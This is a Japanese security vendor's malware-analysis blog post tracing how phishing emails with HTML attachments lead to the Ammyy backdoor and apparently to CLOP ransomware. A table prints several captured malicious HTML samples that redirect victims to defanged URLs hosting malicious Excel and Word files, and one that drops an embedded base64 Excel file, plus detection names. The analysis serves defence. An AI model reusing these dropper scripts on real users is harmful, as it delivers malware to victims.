当社は、これまで Ammyy バックドアの拡散プロセスと、Ammyy バックドアと CLOP ランサムウェアが同じ証明書を使用している点をブログに掲載してきた。これらを総整理し、拡散の段階から最後のランサムウェアまでの拡がりを整理する。以下の [図1] は全般的な構造を表現したものであり、一目で見ても複雑に構成されていることがわかる。

今年、2月初めからメールに不正な文書が添付されて拡散されたが、当社ブログに掲載したように、国税庁を騙るメールをはじめとして、実行を誘導する内容と共に文書ではなく HTML ファイルが添付されたものが出回っていることを確認した。上の [図1] のように、最初の段階が追加された形である。
HTML 内部のコード構造は変化し続けているが、その内容は以下の [表1] の通りである。当社では診断パターンを継続的にアップデートしているが、攻撃者がこれを回避するために、変更し続けたものと推定される。
拡散日 | HTML スクリプト内容 | 説明 |
5月30日 | <html> <head> <title>Downloading, please wait…</title> </head> <body> <script> var url= “hxxp://homeone.co.kr/eTaxInvoice_476543853.xls”; window.location = url; </script> </body> </html> | 不正なxlsのダウンロードパスにリダイレクト |
6月3日 | <!– saved from url=(0022)http://internet.e-mail –> <!DOCTYPE html> <html> <head> <meta charset=”UTF-8″> <title>Downloading…</title> </head> <body> <script> var url= “hxxp://waiireme.com/20190706_983782.xls“; window.location = url; </script> </body> </html> | コメントの挿入によりスクリプト実行警告ウィンドウを削除 |
6月5日(1) | <script> var someb64data = “0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7 … (省略)… AAAAAAAAAAAA”; var link = document.createElement(“a”); link.download = “1.xls”; // Construct the uri var uri = ‘data:application/vnd.ms-excel;charset=utf-8;base64,’ + someb64data; link.href = uri; document.body.appendChild(link); link.click(); // Cleanup the DOM document.body.removeChild(link); </script> </html> | htmlドキュメントにurlではなく、AmmyyマルウェアをダウンロードするExcelオブジェクトを含む |
6月5日(2) | <html> <head> <meta http-equiv=”refresh” content=”1; URL=hxxp://www.ma.mctv.ne.jp/~blanc/C758935.xls”> <title>ダウンロード中…</title> </head> <body> ダウンロード中… </body> </html> | htmlドキュメントに韓国語でタイトルを作成、refreshタグを使用(http-equiv=“refresh”) |
6月18日 | <head> <meta http-equiv=”refresh” content=”0; URL=hxxp://staler.se/I1806201911266473.doc” /> </head> <body> Downloading… </body> | refreshの時間が0秒に変更、xlsからdoc文書に変更 |
6月20日 | <head> <meta http-equiv=”refresh” content=”0; URL=hxxp://nanepashemet.com/20.06.2019_781.37.xls” /> </head> <h2>ダウンロードしています…お待ちください。</h2> | refreshタグの使用有無と時間は同じ、URLパスの拡張子がdocからxlsに変更 |

この HTML が実行されると、追加の不正な文書をダウンロードする。場合によって、Excel あるいは Word をダウンロードする。VBA コードを利用したマクロを利用する、または非表示のマクロシートに XLM マクロコードを使用する場合もある。
様々な形式で拡散している文書は、どれも最終的には追加ファイルをダウンロードするが、このとき Ammyy バックドアを直ちにダウンロードするのではなく、「Ammyy ダウンローダー」をダウンロードする。このダウンローダーは、PE の形式だけでなくMSI 形式でも拡散している。MSI ファイルのような場合は、このインストーラを実行するためにWindows の正常なファイルである msiexec.exe を利用する。そのファイルが実行されると、エンコードされた Ammyy バックドアをダウンロードしてファイルごとにそれぞれハードコーディングされたキーを利用して、RC4 アルゴリズムにより復号を実行する。複合された PE は、C:\ProgramData\Nugets\wsus.exe に保存される。
この復号されたPEファイルが、Ammyy バックドアファイルである。この後のプロセスではバックドア通信が行われないと確認が不可能なため、詳細なプロセスの確認は難しいが、Ammyy バックドアと CLOP ランサムウェアが同じシステムで発見されている点と、2つのマルウェアが同じ証明書を使用している状況から見て、Ammyy バックドアによって CLOP ランサムウェアが拡がっていることを推定できる。
当社は Ammyy バックドアの拡散に対し、さらに CLOP ランサムウェアまでのフローを継続的に分析中であり、確認されている内容についてアップロードする予定である。
これに関連する当社の診断名は以下の通りである。
HTML/AmmyyRat.S1~S4
HTML/Redirect
VBA/AMMacro.S1~S8
MSOffice/Xprocess
BinImage/Agent
Backdoor/Win32.Flawedammyy
Backdoor/Win32.Agent
(その他多数)
Categories:マルウェアの情報